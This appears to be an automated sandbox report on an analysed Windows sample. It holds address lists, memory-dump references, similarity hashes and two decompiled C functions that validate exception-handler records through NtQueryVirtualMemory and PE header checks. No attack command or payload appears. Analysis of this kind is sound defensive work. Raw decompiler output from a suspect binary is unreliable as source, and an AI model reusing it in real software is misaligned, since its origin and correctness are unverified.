0x02ea3f5b
0x02ea3f5e
0x02ea3f78
0x02ea3f7b
0x02ea3f91
0x02ea3f94
0x02ea3f96
0x02ea3fae
0x02ea3fb1
0x02ea3fb4
0x02ea3fcc
0x02ea3fcf
0x02ea3fe9
0x02ea3fec
0x02ea4002
0x02ea4005
0x02ea4007
0x02ea401f
0x02ea4024
0x02ea4027
0x02ea403d
0x02ea4040
0x02ea405a
0x02ea405d
0x02ea4073
0x02ea4076
0x02ea4078
0x02ea4093
0x02ea4096
0x02ea40ad
0x02ea40b0
0x02ea40b4
0x02ea40cd
0x02ea40d0
0x02ea40d2
0x02ea40d5
0x02ea40f0
0x02ea40f3
0x02ea410c
0x02ea410f
0x02ea411f
0x02ea4122
0x02ea413a
0x02ea413d
0x02ea4157
0x02ea415a
0x02ea4172
0x02ea4175
0x02ea418b
0x02ea418e
0x02ea41a6
0x02ea41a9
0x02ea41c1
0x02ea41c4
0x02ea41de
0x02ea41e1
0x02ea41f7
0x02ea41fa
0x02ea4212
0x02ea4215
0x02ea422f
0x02ea4232
0x02ea424a
0x02ea424d
0x02ea4263
0x02ea4266
0x02ea427e
0x02ea4281
0x02ea4299
0x02ea429c
0x02ea42ae
0x02ea42b1
0x02ea42c3
0x02ea42c6
0x02ea42d8
0x02ea42db
0x02ea42df
0x02ea42ef
0x02ea42f2
0x02ea4300
0x02ea4303
0x02ea4315
0x02ea4318
0x02ea432c
0x02ea432f
0x02ea4331
0x02ea4341
0x02ea4344
0x02ea4356
0x02ea4359
0x02ea4367
0x02ea436a
0x02ea437c
0x02ea437f
0x02ea4383
0x02ea4393
0x02ea4396
0x02ea43a8
0x02ea43ab
0x02ea43b9
0x02ea43bc
0x02ea43ce
0x02ea43d1
0x02ea43e3
0x02ea43e6
0x02ea43fa
0x02ea43fd
0x02ea4411
0x02ea4414
0x02ea4428
0x02ea442b
0x02ea443f
0x02ea4442
0x02ea4456
0x02ea4459
0x02ea446d
0x02ea4472
0x02ea4484
0x02ea4487
0x02ea449b
0x02ea449e
0x02ea44b2
0x02ea44b5
0x02ea44cb
0x02ea44ce
0x02ea44e2
0x02ea44e5
0x02ea44f7
0x02ea44fa
0x02ea450e
0x02ea4511
0x02ea4525
0x02ea4528
0x02ea453c
0x02ea4545
0x02ea4548
0x02ea4551
0x02ea455a
0x02ea4562
0x02ea456a
0x02ea4574
0x02ea4589

APIs

memset.NTDLL ref: 02EA457D

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 5864f7f053b59604e316aa71edbfeb0c2904e5abfb6a348cfb0d8265a6a32ea9
Instruction ID: 18c61f76828d05dde8c9b7ebf76f7aa7d74b6e292405a5b628b220cd69e82bfa
Opcode Fuzzy Hash: 5864f7f053b59604e316aa71edbfeb0c2904e5abfb6a348cfb0d8265a6a32ea9
Instruction Fuzzy Hash: 7D22857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A23A5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1A23A5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6e1a4178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6e1a41c0 = 1;
										__eflags =  *0x6e1a41c0;
										if( *0x6e1a41c0 != 0) {
											goto L60;
										}
										_t84 =  *0x6e1a4178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6e1a41c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6e1a4178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6e1a4180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6e1a417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6e1a4180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e1a4180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6e1a41c0 = 1;
							__eflags =  *0x6e1a41c0;
							if( *0x6e1a41c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6e1a4180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6e1a4180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6e1a41c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6e1a4180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6e1a4178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6e1a4180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e1a4180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x6e1a23af
0x6e1a23b2
0x6e1a23b8
0x6e1a23d6
0x00000000
0x6e1a23d6
0x6e1a23c0
0x6e1a23c9
0x6e1a23cf
0x6e1a23de
0x6e1a23e1
0x6e1a23e4
0x6e1a23ee
0x6e1a23ee
0x6e1a23f0
0x6e1a23f3
0x6e1a23f5
0x6e1a23f5
0x6e1a23f7
0x6e1a23fa
0x00000000
0x00000000
0x6e1a23fc
0x6e1a23fe
0x6e1a2464
0x6e1a2464
0x6e1a25c2
0x00000000
0x6e1a25c2
0x6e1a2400
0x6e1a2400
0x6e1a2404
0x6e1a2406
0x6e1a2406
0x6e1a2406
0x6e1a2406
0x6e1a2409
0x6e1a240a
0x6e1a240d
0x6e1a240d
0x6e1a2411
0x6e1a2415
0x6e1a2423
0x6e1a2423
0x6e1a242b
0x6e1a2431
0x6e1a2433
0x6e1a2435
0x6e1a2445
0x6e1a2452
0x6e1a2456
0x6e1a245b
0x6e1a245d
0x6e1a24db
0x6e1a24db
0x6e1a245f
0x6e1a245f
0x6e1a245f
0x6e1a24dd
0x6e1a24df
0x6e1a25c0
0x6e1a25c0
0x00000000
0x6e1a24e5
0x6e1a24e5
0x6e1a24ec
0x00000000
0x00000000
0x6e1a24f2
0x6e1a24f6
0x6e1a2552
0x6e1a2554
0x6e1a255c
0x6e1a255e
0x6e1a2560
0x00000000
0x00000000
0x6e1a2562
0x6e1a2568
0x6e1a256a
0x6e1a256c
0x6e1a2581
0x6e1a2581
0x6e1a2583
0x6e1a25b2
0x6e1a25b9
0x00000000
0x6e1a25b9
0x6e1a2587
0x6e1a2588
0x6e1a258a
0x6e1a258c
0x6e1a258c
0x6e1a258e
0x6e1a2590
0x6e1a2592
0x6e1a25a6
0x6e1a25a6
0x6e1a25a9
0x6e1a25ab
0x6e1a25ab
0x6e1a25ac
0x6e1a25ac
0x00000000
0x6e1a2594
0x6e1a2594
0x6e1a2594
0x6e1a259d
0x6e1a259e
0x6e1a25a0
0x6e1a25a2
0x6e1a25a2
0x00000000
0x6e1a2594
0x6e1a2592
0x6e1a256e
0x6e1a2575
0x6e1a2575
0x6e1a2577
0x00000000
0x00000000
0x6e1a2579
0x6e1a257a
0x6e1a257d
0x6e1a257f
0x00000000
0x00000000
0x00000000
0x6e1a257f
0x00000000
0x6e1a2575
0x6e1a24f8
0x6e1a24fb
0x6e1a2500
0x00000000
0x00000000
0x6e1a2509
0x6e1a250b
0x6e1a2511
0x00000000
0x00000000
0x6e1a2517
0x6e1a251d
0x00000000
0x00000000
0x6e1a2523
0x6e1a2525
0x6e1a252e
0x6e1a2532
0x00000000
0x00000000
0x6e1a2538
0x6e1a253b
0x6e1a253d
0x00000000
0x00000000
0x6e1a2544
0x6e1a2546
0x00000000
0x00000000
0x6e1a2548
0x6e1a254c
0x00000000
0x00000000
0x00000000
0x6e1a254c
0x00000000
0x00000000
0x00000000
0x6e1a2437
0x6e1a2437
0x6e1a2437
0x6e1a243e
0x00000000
0x00000000
0x6e1a2440
0x6e1a2441
0x6e1a2443
0x00000000
0x00000000
0x00000000
0x6e1a2443
0x6e1a246b
0x6e1a246d
0x00000000
0x00000000
0x6e1a247d
0x6e1a247f
0x6e1a2481
0x00000000
0x00000000
0x6e1a2487
0x6e1a248e
0x6e1a24ba
0x6e1a24ba
0x6e1a24bc
0x6e1a24be
0x6e1a24d2
0x6e1a24d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1a24c0
0x6e1a24c0
0x6e1a24c0
0x6e1a24c9
0x6e1a24ca
0x6e1a24cc
0x6e1a24ce
0x6e1a24ce
0x00000000
0x6e1a24c0
0x6e1a2490
0x6e1a2493
0x6e1a2495
0x6e1a24a7
0x6e1a24a7
0x6e1a24aa
0x6e1a24ac
0x6e1a24ac
0x6e1a24ad
0x6e1a24ad
0x6e1a24b3
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1a2497
0x6e1a2497
0x6e1a2497
0x6e1a249e
0x00000000
0x00000000
0x6e1a24a0
0x6e1a24a0
0x6e1a24a1
0x00000000
0x00000000
0x00000000
0x6e1a24a1
0x6e1a24a3
0x6e1a24a5
0x6e1a24b8
0x00000000
0x00000000
0x00000000
0x6e1a24b8
0x00000000
0x6e1a24a5
0x6e1a2417
0x6e1a241a
0x6e1a241d
0x00000000
0x00000000
0x6e1a241f
0x6e1a2421
0x00000000
0x00000000
0x00000000
0x6e1a2421
0x6e1a23e6
0x6e1a23e8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E1A2456

Memory Dump Source

Source File: 00000002.00000002.482973079.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.482953775.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483022155.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483068232.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.483115438.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 3f5804898270bc851569b9b787777f8a4a64f33de0bd0b754fe8f43f1a18f306
Instruction ID: dd7a04617a4bf630f1280e6e73bc4cc053a83af14a02927355e89b26ac6b0795
Opcode Fuzzy Hash: 3f5804898270bc851569b9b787777f8a4a64f33de0bd0b754fe8f43f1a18f306
Instruction Fuzzy Hash: CF61B078714606CFEB59CBAFC8A06B937A5FB66314B208528DA16C7184F730D8C2EB50

Uniqueness

Uniqueness Score: -1.00%

Function 02EAB1A5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02EAB1A5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x2ead2e0; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x2ead328 = 1;
										__eflags =  *0x2ead328;
										if( *0x2ead328 != 0) {
											goto L60;
										}
										_t84 =  *0x2ead2e0; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x2ead328 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x2ead2e0 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x2ead2e8 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x2ead2e4 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x2ead2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x2ead2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x2ead328 = 1;
							__eflags =  *0x2ead328;
							if( *0x2ead328 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x2ead2e8 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x2ead2e8 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x2ead328 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x2ead2e8 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x2ead2e0 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x2ead2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x2ead2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x02eab1af
0x02eab1b2
0x02eab1b8
0x02eab1d6
0x00000000
0x02eab1d6
0x02eab1c0
0x02eab1c9
0x02eab1cf
0x02eab1de
0x02eab1e1
0x02eab1e4
0x02eab1ee
0x02eab1ee
0x02eab1f0
0x02eab1f3
0x02eab1f5
0x02eab1f5
0x02eab1f7
0x02eab1fa
0x00000000
0x00000000
0x02eab1fc
0x02eab1fe
0x02eab264
0x02eab264
0x02eab3c2
0x00000000
0x02eab3c2
0x02eab200
0x02eab200
0x02eab204
0x02eab206
0x02eab206
0x02eab206
0x02eab206
0x02eab209
0x02eab20a
0x02eab20d
0x02eab20d
0x02eab211
0x02eab215
0x02eab223
0x02eab223
0x02eab22b
0x02eab231
0x02eab233
0x02eab235
0x02eab245
0x02eab252
0x02eab256
0x02eab25b
0x02eab25d
0x02eab2db
0x02eab2db
0x02eab25f
0x02eab25f
0x02eab25f
0x02eab2dd
0x02eab2df
0x02eab3c0
0x02eab3c0
0x00000000
0x02eab2e5
0x02eab2e5
0x02eab2ec
0x00000000
0x00000000
0x02eab2f2
0x02eab2f6
0x02eab352
0x02eab354
0x02eab35c
0x02eab35e
0x02eab360
0x00000000
0x00000000
0x02eab362
0x02eab368
0x02eab36a
0x02eab36c
0x02eab381
0x02eab381
0x02eab383
0x02eab3b2
0x02eab3b9
0x00000000
0x02eab3b9
0x02eab387
0x02eab388
0x02eab38a
0x02eab38c
0x02eab38c
0x02eab38e
0x02eab390
0x02eab392
0x02eab3a6
0x02eab3a6
0x02eab3a9
0x02eab3ab
0x02eab3ab
0x02eab3ac
0x02eab3ac
0x00000000
0x02eab394
0x02eab394
0x02eab394
0x02eab39d
0x02eab39e
0x02eab3a0
0x02eab3a2
0x02eab3a2
0x00000000
0x02eab394
0x02eab392
0x02eab36e
0x02eab375
0x02eab375
0x02eab377
0x00000000
0x00000000
0x02eab379
0x02eab37a
0x02eab37d
0x02eab37f
0x00000000
0x00000000
0x00000000
0x02eab37f
0x00000000
0x02eab375
0x02eab2f8
0x02eab2fb
0x02eab300
0x00000000
0x00000000
0x02eab309
0x02eab30b
0x02eab311
0x00000000
0x00000000
0x02eab317
0x02eab31d
0x00000000
0x00000000
0x02eab323
0x02eab325
0x02eab32e
0x02eab332
0x00000000
0x00000000
0x02eab338
0x02eab33b
0x02eab33d
0x00000000
0x00000000
0x02eab344
0x02eab346
0x00000000
0x00000000
0x02eab348
0x02eab34c
0x00000000
0x00000000
0x00000000
0x02eab34c
0x00000000
0x00000000
0x00000000
0x02eab237
0x02eab237
0x02eab237
0x02eab23e
0x00000000
0x00000000
0x02eab240
0x02eab241
0x02eab243
0x00000000
0x00000000
0x00000000
0x02eab243
0x02eab26b
0x02eab26d
0x00000000
0x00000000
0x02eab27d
0x02eab27f
0x02eab281
0x00000000
0x00000000
0x02eab287
0x02eab28e
0x02eab2ba
0x02eab2ba
0x02eab2bc
0x02eab2be
0x02eab2d2
0x02eab2d4
0x00000000
0x00000000
0x00000000
0x00000000
0x02eab2c0
0x02eab2c0
0x02eab2c0
0x02eab2c9
0x02eab2ca
0x02eab2cc
0x02eab2ce
0x02eab2ce
0x00000000
0x02eab2c0
0x02eab290
0x02eab290
0x02eab293
0x02eab295
0x02eab2a7
0x02eab2a7
0x02eab2aa
0x02eab2ac
0x02eab2ac
0x02eab2ad
0x02eab2ad
0x02eab2b3
0x02eab2b3
0x00000000
0x00000000
0x00000000
0x00000000
0x02eab297
0x02eab297
0x02eab297
0x02eab29e
0x00000000
0x00000000
0x02eab2a0
0x02eab2a0
0x02eab2a1
0x00000000
0x00000000
0x00000000
0x02eab2a1
0x02eab2a3
0x02eab2a5
0x02eab2b8
0x00000000
0x00000000
0x00000000
0x02eab2b8
0x00000000
0x02eab2a5
0x02eab217
0x02eab21a
0x02eab21d
0x00000000
0x00000000
0x02eab21f
0x02eab221
0x00000000
0x00000000
0x00000000
0x02eab221
0x02eab1e6
0x02eab1e8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 02EAB256

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 669fc9f5df389fc926b4e3f4432bc1bd1ccfaa6ffcdad6076cac3fb3f23eb3eb
Instruction ID: b9ba97b57555001b240a28b699b3c89b055b2ea2530edee6ab917678be405bc7
Opcode Fuzzy Hash: 669fc9f5df389fc926b4e3f4432bc1bd1ccfaa6ffcdad6076cac3fb3f23eb3eb
Instruction Fuzzy Hash: 7761D330AC06058FCB25CA29C8B076D77A6EFA531CB64E56ED45ACF590E770F885C760

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C99A0, Relevance: 1.5, Strings: 1, Instructions: 297COMMON

Download Yara Rule

Strings

C, xrefs: 6E1C99A8

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID:
String ID: C
API String ID: 0-1037565863
Opcode ID: 603a5c81f3fe3df8563734fa27158b1cedf9429d1957fd40fdc90e23807e16f0
Instruction ID: 6679205c6aa798592478e9599be1675971b8104ae4f49d2edd47342b47ee6592
Opcode Fuzzy Hash: 603a5c81f3fe3df8563734fa27158b1cedf9429d1957fd40fdc90e23807e16f0
Instruction Fuzzy Hash: 9AD15EB2900615CFDF08CFA8C498BAE7BF3BB69304F14811ED545A7385D7749A84DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CDA30, Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76aace753743a51d4a5b7e1f2ba2b180d76349526be49a18216bd78909aecb8d
